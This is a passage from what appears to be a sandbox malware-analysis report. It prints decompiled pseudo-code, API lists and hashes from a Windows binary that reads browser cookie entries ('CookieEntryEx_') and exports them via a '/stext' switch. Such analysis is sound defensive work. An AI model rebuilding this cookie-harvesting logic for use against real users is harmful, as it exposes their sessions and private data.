                                                                                                                                                      				if(_t3 != 0) {
                                                                                                                                                      					_push(_t3);
                                                                                                                                                      					L0040E032();
                                                                                                                                                      				}
                                                                                                                                                      				_t4 =  *0x41327c; // 0x9a7528
                                                                                                                                                      				if(_t4 != 0) {
                                                                                                                                                      					_push(_t4); // executed
                                                                                                                                                      					L0040E032(); // executed
                                                                                                                                                      					return _t4;
                                                                                                                                                      				}
                                                                                                                                                      				return _t4;
                                                                                                                                                      			}








                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??3@
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                      			E0040BD40(void* __eax, void* __edx, void* __eflags) {
                                                                                                                                                      				intOrPtr _v4;
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				signed int _t33;
                                                                                                                                                      				intOrPtr _t34;
                                                                                                                                                      				signed int _t43;
                                                                                                                                                      				intOrPtr _t54;
                                                                                                                                                      				intOrPtr* _t55;
                                                                                                                                                      				void* _t60;
                                                                                                                                                      				void* _t61;
                                                                                                                                                      				signed int _t65;
                                                                                                                                                      				intOrPtr _t66;
                                                                                                                                                      				void* _t71;
                                                                                                                                                      
                                                                                                                                                      				_t60 = __edx;
                                                                                                                                                      				_t54 = 0;
                                                                                                                                                      				_t61 = __eax;
                                                                                                                                                      				_v4 = 0;
                                                                                                                                                      				E00401EA3( *((intOrPtr*)(__eax + 0x69c)), __eflags, 0, 0);
                                                                                                                                                      				 *((intOrPtr*)(_t61 + 0x208)) = 0;
                                                                                                                                                      				_t71 = 0;
                                                                                                                                                      				_v16 = 0;
                                                                                                                                                      				if( *((intOrPtr*)( *((intOrPtr*)(_t61 + 0x6c0)) + 0x30)) - 1 <= 0) {
                                                                                                                                                      					L18:
                                                                                                                                                      					return _v4;
                                                                                                                                                      				} else {
                                                                                                                                                      					goto L1;
                                                                                                                                                      				}
                                                                                                                                                      				do {
                                                                                                                                                      					L1:
                                                                                                                                                      					_t33 =  *((intOrPtr*)(_t61 + 0x6c0));
                                                                                                                                                      					if(_t54 >=  *((intOrPtr*)(_t33 + 0x30))) {
                                                                                                                                                      						_t65 = 0x40f454;
                                                                                                                                                      					} else {
                                                                                                                                                      						_t33 = E00406306(_t33, _t54);
                                                                                                                                                      						_t65 = _t33;
                                                                                                                                                      					}
                                                                                                                                                      					_push(_t65);
                                                                                                                                                      					_push(L"/stext");
                                                                                                                                                      					L0040E03E();
                                                                                                                                                      					_pop(_t57);
                                                                                                                                                      					if(_t33 != 0) {
                                                                                                                                                      						_t34 = E0040BCAA(_t33, _t65);
                                                                                                                                                      						__eflags = _t34;
                                                                                                                                                      						if(_t34 <= 0) {
                                                                                                                                                      							goto L8;
                                                                                                                                                      						}
                                                                                                                                                      						goto L7;
                                                                                                                                                      					} else {
                                                                                                                                                      						_t34 = _t33 + 1;
                                                                                                                                                      						L7:
                                                                                                                                                      						_v8 = _t34;
                                                                                                                                                      						_t10 = _t54 + 1; // 0x2
                                                                                                                                                      						_t71 = _t10;
                                                                                                                                                      					}
                                                                                                                                                      					L8:
                                                                                                                                                      					_t54 = _t54 + 1;
                                                                                                                                                      				} while (_t54 <  *((intOrPtr*)( *((intOrPtr*)(_t61 + 0x6c0)) + 0x30)) - 1);
                                                                                                                                                      				_t66 = _v8;
                                                                                                                                                      				if(_t66 > 0) {
                                                                                                                                                      					E0040B147(_t61, _t57, 0); // executed
                                                                                                                                                      					E0040A4C2(_t61);
                                                                                                                                                      					_t42 =  *((intOrPtr*)(_t61 + 0x6c0));
                                                                                                                                                      					if(_t71 >=  *((intOrPtr*)( *((intOrPtr*)(_t61 + 0x6c0)) + 0x30))) {
                                                                                                                                                      						_t43 = 0x40f454;
                                                                                                                                                      					} else {
                                                                                                                                                      						_t57 = _t71;
                                                                                                                                                      						_t43 = E00406306(_t42, _t71);
                                                                                                                                                      					}
                                                                                                                                                      					_t79 = _t66 - 8;
                                                                                                                                                      					if(_t66 != 8) {
                                                                                                                                                      						E004096FE( *((intOrPtr*)(_t61 + 0x69c)), _t60, __eflags, _t43, _t66); // executed
                                                                                                                                                      					} else {
                                                                                                                                                      						E0040ACA7(_t61, _t57, _t60, _t79, _t43, 0);
                                                                                                                                                      					}
                                                                                                                                                      					_t55 =  *((intOrPtr*)(_t61 + 0x69c));
                                                                                                                                                      					_v4 = 1;
                                                                                                                                                      					if(_t55 != 0) {
                                                                                                                                                      						 *_t55 = 0x40f648;
                                                                                                                                                      						 *((intOrPtr*)(_t55 + 0x34c)) = 0x40f6e0;
                                                                                                                                                      						E00403F55(_t55 + 0xbf0);
                                                                                                                                                      						E0040623E(_t55 + 0xbd0);
                                                                                                                                                      						E0040623E(_t55 + 0xbac);
                                                                                                                                                      						E00406355(_t55 + 0xb98);
                                                                                                                                                      						 *((intOrPtr*)(_t55 + 0x34c)) = 0x40f948;
                                                                                                                                                      						E00403FBE(_t55 + 0x350);
                                                                                                                                                      						E004076F4(_t55);
                                                                                                                                                      						_push(_t55);
                                                                                                                                                      						L0040E032();
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				goto L18;
                                                                                                                                                      			}



















                                                                                                                                                      APIs
                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040BD9B
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040BE86
                                                                                                                                                        • Part of subcall function 0040BCAA: _wcsicmp.MSVCRT ref: 0040BCB0
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wcsicmp$??3@
                                                                                                                                                      • String ID: /stext
                                                                                                                                                      • API String ID: 3682227554-3817206916
                                                                                                                                                      • Opcode ID: b49fe5e3a00eb3dd06afc28d0350945e3807d706bde39c4344975c329a5855a1
                                                                                                                                                      • Instruction ID: d8bbb9b930e80b6915cfb13594633440f620dbacd53bdbbf48f85004c8b902b2
                                                                                                                                                      • Opcode Fuzzy Hash: b49fe5e3a00eb3dd06afc28d0350945e3807d706bde39c4344975c329a5855a1
                                                                                                                                                      • Instruction Fuzzy Hash: CF31A6316002019BD710FE26D88169AB799FF40358F01057FFC09BB292CB7DA81987ED
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 81%
                                                                                                                                                      			E00403EAC(void* __ecx, void* __edx, void* __edi) {
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				intOrPtr _t9;
                                                                                                                                                      				void* _t14;
                                                                                                                                                      				void* _t21;
                                                                                                                                                      				void* _t22;
                                                                                                                                                      				void* _t24;
                                                                                                                                                      				WCHAR* _t27;
                                                                                                                                                      				signed int _t28;
                                                                                                                                                      				signed int _t29;
                                                                                                                                                      
                                                                                                                                                      				_t22 = __edi;
                                                                                                                                                      				_t21 = __edx;
                                                                                                                                                      				_t29 = _t28 & 0xfffffff8;
                                                                                                                                                      				_push(__ecx);
                                                                                                                                                      				_push(__ecx);
                                                                                                                                                      				_t9 = E004039F6(__edi); // executed
                                                                                                                                                      				_t24 = 0;
                                                                                                                                                      				_v8 = _t9;
                                                                                                                                                      				if(_t9 != 0) {
                                                                                                                                                      					L7:
                                                                                                                                                      					return _v8;
                                                                                                                                                      				}
                                                                                                                                                      				if( *((intOrPtr*)(__edi + 0x42c)) <= 0) {
                                                                                                                                                      					L5:
                                                                                                                                                      					E0040405E(_t22 + 4);
                                                                                                                                                      					_t27 = _t22 + 0x430;
                                                                                                                                                      					if( *_t27 != 0) {
                                                                                                                                                      						DeleteFileW(_t27); // executed
                                                                                                                                                      						 *_t27 =  *_t27 & 0x00000000;
                                                                                                                                                      					}
                                                                                                                                                      					goto L7;
                                                                                                                                                      				} else {
                                                                                                                                                      					goto L2;
                                                                                                                                                      				}
                                                                                                                                                      				do {
                                                                                                                                                      					L2:
                                                                                                                                                      					_t14 = E00403F2B(_t24, _t22 + 0x420);
                                                                                                                                                      					_push(0xe);
                                                                                                                                                      					_t18 = _t14;
                                                                                                                                                      					_push(L"CookieEntryEx_");
                                                                                                                                                      					_push(_t14);
                                                                                                                                                      					L0040E044();
                                                                                                                                                      					_t29 = _t29 + 0xc;
                                                                                                                                                      					if(_t14 == 0) {
                                                                                                                                                      						E00403BAF(_t21, _t22, _t18); // executed
                                                                                                                                                      					}
                                                                                                                                                      					_t24 = _t24 + 1;
                                                                                                                                                      				} while (_t24 <  *((intOrPtr*)(_t22 + 0x42c)));
                                                                                                                                                      				goto L5;
                                                                                                                                                      			}

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 004039F6: memset.MSVCRT ref: 00403A36
                                                                                                                                                        • Part of subcall function 004039F6: memset.MSVCRT ref: 00403A50
                                                                                                                                                        • Part of subcall function 004039F6: wcslen.MSVCRT ref: 00403A68
                                                                                                                                                        • Part of subcall function 004039F6: wcslen.MSVCRT ref: 00403A77
                                                                                                                                                      • _wcsnicmp.MSVCRT ref: 00403EE6
                                                                                                                                                        • Part of subcall function 00403BAF: memset.MSVCRT ref: 00403CCA
                                                                                                                                                      • DeleteFileW.KERNELBASE(?), ref: 00403F17
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$wcslen$DeleteFile_wcsnicmp
                                                                                                                                                      • String ID: CookieEntryEx_
                                                                                                                                                      • API String ID: 3258848388-47494461
                                                                                                                                                      • Opcode ID: 66636eece1735f668a1aae4ed6bccc9c4179c0fd9ab6a026f0bbd4c75a5b9373
                                                                                                                                                      • Instruction ID: 4f7492928af6ede5aa7db47b88c775c9002a426620b820d7d458ceab620e9f9d
                                                                                                                                                      • Opcode Fuzzy Hash: 66636eece1735f668a1aae4ed6bccc9c4179c0fd9ab6a026f0bbd4c75a5b9373
                                                                                                                                                      • Instruction Fuzzy Hash: DF01DBF1A10512AAC2146F25CC426ABF7ACFB04705F00463AF954B31C2E7B86E5187DD
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 83%
                                                                                                                                                      			E00406785() {
                                                                                                                                                      				void* _t25;
                                                                                                                                                      				signed int _t27;
                                                                                                                                                      				signed int _t28;
                                                                                                                                                      				signed int _t29;
                                                                                                                                                      				signed int _t30;
                                                                                                                                                      				signed int _t31;
                                                                                                                                                      				signed int _t32;
                                                                                                                                                      				signed int _t33;
                                                                                                                                                      				signed int _t50;
                                                                                                                                                      				signed int _t52;
                                                                                                                                                      				signed int _t54;
                                                                                                                                                      				signed int _t56;
                                                                                                                                                      				intOrPtr _t60;
                                                                                                                                                      
                                                                                                                                                      				_t60 =  *0x413288;
                                                                                                                                                      				if(_t60 == 0) {
                                                                                                                                                      					_t50 = 2;
                                                                                                                                                      					 *0x413288 = 0x8000;
                                                                                                                                                      					_t27 = 0x8000 * _t50;
                                                                                                                                                      					 *0x41328c = 0x100;
                                                                                                                                                      					 *0x413290 = 0x1000;
                                                                                                                                                      					_push( ~(0 | _t60 > 0x00000000) | _t27); // executed
                                                                                                                                                      					L0040E038(); // executed
                                                                                                                                                      					 *0x413270 = _t27;
                                                                                                                                                      					_t28 =  *0x41328c; // 0x100
                                                                                                                                                      					_t52 = 4;
                                                                                                                                                      					_t29 = _t28 * _t52;
                                                                                                                                                      					_push( ~(0 | _t60 > 0x00000000) | _t29);
                                                                                                                                                      					L0040E038();
                                                                                                                                                      					 *0x413278 = _t29;
                                                                                                                                                      					_t30 =  *0x41328c; // 0x100
                                                                                                                                                      					_t54 = 4;
                                                                                                                                                      					_t31 = _t30 * _t54;
                                                                                                                                                      					_push( ~(0 | _t60 > 0x00000000) | _t31);
                                                                                                                                                      					L0040E038();
                                                                                                                                                      					 *0x41327c = _t31;
                                                                                                                                                      					_t32 =  *0x413290; // 0x1000
                                                                                                                                                      					_t56 = 2;
                                                                                                                                                      					_t33 = _t32 * _t56;
                                                                                                                                                      					_push( ~(0 | _t60 > 0x00000000) | _t33); // executed
                                                                                                                                                      					L0040E038(); // executed
                                                                                                                                                      					 *0x413274 = _t33;
                                                                                                                                                      					return _t33;
                                                                                                                                                      				}
                                                                                                                                                      				return _t25;
                                                                                                                                                      			}

















                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1033339047-0
                                                                                                                                                      • Opcode ID: 8ab13f23862ced8c753b30d0abc2faf3e5d18bbc6e8aa25b2abc565fa32c18db
                                                                                                                                                      • Instruction ID: 453b2fe8fef47dc3e01595af69639ea7307b60866b1d7e5282fab9a2940fa031
                                                                                                                                                      • Opcode Fuzzy Hash: 8ab13f23862ced8c753b30d0abc2faf3e5d18bbc6e8aa25b2abc565fa32c18db
                                                                                                                                                      • Instruction Fuzzy Hash: 830121B12422105EEB5CAF39ED0776A66D4A748345F40C5BFF106DE1F4EBB985448B08
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040567E(WCHAR* __edi, WCHAR* _a4) {
                                                                                                                                                      				short _v524;
                                                                                                                                                      				WCHAR* _t12;
                                                                                                                                                      
                                                                                                                                                      				_t12 = __edi;
                                                                                                                                                      				if(GetTempPathW(0x104,  &_v524) == 0) {
                                                                                                                                                      					GetWindowsDirectoryW( &_v524, 0x104);
                                                                                                                                                      				}
                                                                                                                                                      				 *_t12 =  *_t12 & 0x00000000;
                                                                                                                                                      				GetTempFileNameW( &_v524, _a4, 0, _t12); // executed
                                                                                                                                                      				return _t12;
                                                                                                                                                      			}






                                                                                                                                                      APIs
                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 00405695
                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004056A7
                                                                                                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?), ref: 004056BE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1125800050-0
                                                                                                                                                      • Opcode ID: a6a92a3c40634cb4734888aa7d27f433ca36c8edd77e4dee02c29b005201ca48
                                                                                                                                                      • Instruction ID: c75b1f9f3821b2d5fe4ff9c2abf5100b014bffad6fc652feb2669510f5e075a4
                                                                                                                                                      • Opcode Fuzzy Hash: a6a92a3c40634cb4734888aa7d27f433ca36c8edd77e4dee02c29b005201ca48
                                                                                                                                                      • Instruction Fuzzy Hash: E9E09276500319EBDB209B50DC0DFC7377CEB84304F000470B945F2151E634AA488BA8
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 79%
                                                                                                                                                      			E00404070(void** __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                      				void* _t14;
                                                                                                                                                      				void* _t15;
                                                                                                                                                      
                                                                                                                                                      				_t17 =  *(__esi[0x106] + 0xec);
                                                                                                                                                      				_t11 = _a8 + 1;
                                                                                                                                                      				_push(0);
                                                                                                                                                      				SetFilePointerEx( *__esi, (_a8 + 1) *  *(__esi[0x106] + 0xec), _t11 * _t17 >> 0x20, 0); // executed
                                                                                                                                                      				_t14 = E00405E43(_t15,  *__esi, _a4, _t17); // executed
                                                                                                                                                      				return _t14;
                                                                                                                                                      			}






                                                                                                                                                      APIs
                                                                                                                                                      • SetFilePointerEx.KERNELBASE(F@@,?,?,00000000,00000000,00000000,004046C5,00000000,00000000,?,00000000,F@@), ref: 0040408C
                                                                                                                                                        • Part of subcall function 00405E43: ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040400E,00000000,?,00000400,?,00000000,00403B9A,?), ref: 00405E5A
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$PointerRead
                                                                                                                                                      • String ID: F@@
                                                                                                                                                      • API String ID: 3154509469-234039029
                                                                                                                                                      • Opcode ID: 824bb1f14422cc71d1a3dffc559b1a5fb77c784d9cd166a2f2aef982484e0c7b
                                                                                                                                                      • Instruction ID: f9449c32f6c0a510c9187a937022f757e046aad29a301ac44eac800f026f52ab
                                                                                                                                                      • Opcode Fuzzy Hash: 824bb1f14422cc71d1a3dffc559b1a5fb77c784d9cd166a2f2aef982484e0c7b
                                                                                                                                                      • Instruction Fuzzy Hash: F2E01776100100FFE6619B09DC05F6BBBB9EBD4710F14C83EB6D5A61B4C6726952CF64
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 57%
                                                                                                                                                      			E004096FE(intOrPtr* __eax, void* __edx, void* __eflags, short* _a4, intOrPtr _a8) {
                                                                                                                                                      				signed int _v8;
                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				void* __ecx;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				void* _t24;
                                                                                                                                                      				intOrPtr _t34;
                                                                                                                                                      				void* _t42;
                                                                                                                                                      				void* _t44;
                                                                                                                                                      				void* _t51;
                                                                                                                                                      				signed int _t54;
                                                                                                                                                      				intOrPtr* _t58;
                                                                                                                                                      				void* _t62;
                                                                                                                                                      
                                                                                                                                                      				_t62 = __eflags;
                                                                                                                                                      				_t51 = __edx;
                                                                                                                                                      				_push(_t44);
                                                                                                                                                      				_push(_t44);
                                                                                                                                                      				_t54 = 0;
                                                                                                                                                      				_t58 = __eax;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				E0040951A(__eax, _a8);
                                                                                                                                                      				E00407A66(_t58, _t62);
                                                                                                                                                      				_t23 = _a4;
                                                                                                                                                      				if( *_a4 == 0) {
                                                                                                                                                      					_t24 = GetStdHandle(0xfffffff5);
                                                                                                                                                      				} else {
                                                                                                                                                      					_t24 = E00405351(_t23);
                                                                                                                                                      					_pop(_t44);
                                                                                                                                                      				}
                                                                                                                                                      				_t42 = _t24;
                                                                                                                                                      				if(_t42 == 0xffffffff) {
                                                                                                                                                      					__eflags = 0;
                                                                                                                                                      					E004053B1(0, 0, _t54);
                                                                                                                                                      				} else {
                                                                                                                                                      					if( *((intOrPtr*)(_t58 + 0x24)) != _t54) {
                                                                                                                                                      						if( *((intOrPtr*)(_t58 + 0x28)) == _t54) {
                                                                                                                                                      							_push(2);
                                                                                                                                                      							_push(0x40ff4c);
                                                                                                                                                      						} else {
                                                                                                                                                      							_push(3);
                                                                                                                                                      							_push(0x40ff48);
                                                                                                                                                      						}
                                                                                                                                                      						_push(_t42); // executed
                                                                                                                                                      						E00405E62(_t44); // executed
                                                                                                                                                      					}
                                                                                                                                                      					_v8 = 1;
                                                                                                                                                      					E0040528C();
                                                                                                                                                      					E00409C22(_t58, _t51, _t42, _a8); // executed
                                                                                                                                                      					if( *((intOrPtr*)(_t58 + 0x3c)) > _t54) {
                                                                                                                                                      						do {
                                                                                                                                                      							_t34 = E00407588(_t58, _t54);
                                                                                                                                                      							_push(_t34);
                                                                                                                                                      							_v12 = _t34;
                                                                                                                                                      							if( *((intOrPtr*)( *_t58 + 0x30))() == 0) {
                                                                                                                                                      								goto L12;
                                                                                                                                                      							} else {
                                                                                                                                                      								_push(_a8);
                                                                                                                                                      								_push(_v12);
                                                                                                                                                      								_push(_t42); // executed
                                                                                                                                                      								if( *((intOrPtr*)( *_t58 + 0x84))() == 0) {
                                                                                                                                                      									_v8 = _v8 & 0x00000000;
                                                                                                                                                      									__eflags = 0;
                                                                                                                                                      									E004053B1(0, 0, 0);
                                                                                                                                                      								} else {
                                                                                                                                                      									goto L12;
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      							goto L15;
                                                                                                                                                      							L12:
                                                                                                                                                      							_t54 = _t54 + 1;
                                                                                                                                                      						} while (_t54 <  *((intOrPtr*)(_t58 + 0x3c)));
                                                                                                                                                      					}
                                                                                                                                                      					L15:
                                                                                                                                                      					E00409BE4(_a8, _t58, _t42);
                                                                                                                                                      					if( *_a4 != 0) {
                                                                                                                                                      						FindCloseChangeNotification(_t42); // executed
                                                                                                                                                      					}
                                                                                                                                                      					E004052A6();
                                                                                                                                                      				}
                                                                                                                                                      				return _v8;
                                                                                                                                                      			}


















                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00407A66: ??2@YAPAXI@Z.MSVCRT ref: 00407A87
                                                                                                                                                        • Part of subcall function 00407A66: ??3@YAXPAX@Z.MSVCRT ref: 00407B4E
                                                                                                                                                      • GetStdHandle.KERNEL32(000000F5,?,?,00000000,00000002,?,?,00000001,0040BE1B,0040F454,00000000,00000000,00000000,00000000,74784E00,?), ref: 0040972F
                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(00000000,00000000,00000000,?,?,?,00000001,0040BE1B,0040F454,00000000,00000000,00000000,00000000,74784E00,?), ref: 004097D2
                                                                                                                                                        • Part of subcall function 00405351: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040972A,?,?,?,00000000,00000002,?,?,00000001), ref: 00405363
                                                                                                                                                        • Part of subcall function 004053B1: GetLastError.KERNEL32(00000000,?,004097E7,00000000,?,?,00000001,0040BE1B,0040F454,00000000,00000000,00000000,00000000,74784E00,?), ref: 004053C5
                                                                                                                                                        • Part of subcall function 004053B1: _snwprintf.MSVCRT ref: 004053F2
                                                                                                                                                        • Part of subcall function 004053B1: MessageBoxW.USER32(?,?,Error,00000030), ref: 0040540B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1161345128-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00404689(void** __ecx, void* __eflags, intOrPtr _a4, void* _a8) {
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				signed int _v12;
                                                                                                                                                      				signed int _v16;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				intOrPtr _t25;
                                                                                                                                                      				void* _t28;
                                                                                                                                                      				void** _t29;
                                                                                                                                                      				void* _t34;
                                                                                                                                                      				intOrPtr _t37;
                                                                                                                                                      				void* _t38;
                                                                                                                                                      
                                                                                                                                                      				_t30 = __ecx;
                                                                                                                                                      				_v16 = _v16 & 0x00000000;
                                                                                                                                                      				_v12 = _v12 & 0x00000000;
                                                                                                                                                      				_t29 = __ecx;
                                                                                                                                                      				_v8 = 0x1388;
                                                                                                                                                      				E00406729( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x418)) + 0xec)),  &_v16);
                                                                                                                                                      				_t34 = _v16;
                                                                                                                                                      				if(E00404070(_t29, _t34, _a4) == 0) {
                                                                                                                                                      					_t37 = 0;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t38 = _a8;
                                                                                                                                                      					if( *(_t34 + 0x24) != 1) {
                                                                                                                                                      						L6:
                                                                                                                                                      						__eflags =  *(_t34 + 0x24) & 0x00000004;
                                                                                                                                                      						if(( *(_t34 + 0x24) & 0x00000004) != 0) {
                                                                                                                                                      							_t25 = E0040460C(_t30, _t29, _t34, _t38); // executed
                                                                                                                                                      							goto L4;
                                                                                                                                                      						} else {
                                                                                                                                                      							memcpy(_t38, _t34,  *( *((intOrPtr*)(_t29 + 0x418)) + 0xec));
                                                                                                                                                      							_t37 = _a4;
                                                                                                                                                      						}
                                                                                                                                                      					} else {
                                                                                                                                                      						_t28 = E0040460C(_t30, _t29, _t34, _t38);
                                                                                                                                                      						_t44 = _t28;
                                                                                                                                                      						if(_t28 == 0) {
                                                                                                                                                      							goto L6;
                                                                                                                                                      						} else {
                                                                                                                                                      							_t25 = E00404689(_t29, _t44, _t28, _t38);
                                                                                                                                                      							L4:
                                                                                                                                                      							_t37 = _t25;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				E00406710( &_v16);
                                                                                                                                                      				return _t37;
                                                                                                                                                      			}


                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00406729: ??3@YAXPAX@Z.MSVCRT ref: 00406730
                                                                                                                                                        • Part of subcall function 00406729: ??2@YAPAXI@Z.MSVCRT ref: 0040673E
                                                                                                                                                        • Part of subcall function 00404070: SetFilePointerEx.KERNELBASE(F@@,?,?,00000000,00000000,00000000,004046C5,00000000,00000000,?,00000000,F@@), ref: 0040408C
                                                                                                                                                      • memcpy.MSVCRT ref: 0040470E
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@??3@FilePointermemcpy
                                                                                                                                                      • String ID: F@@
                                                                                                                                                      • API String ID: 402491248-234039029
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040536A(void* _a4, void* _a8) {
                                                                                                                                                      				long _v8;
                                                                                                                                                      				int _t8;
                                                                                                                                                      
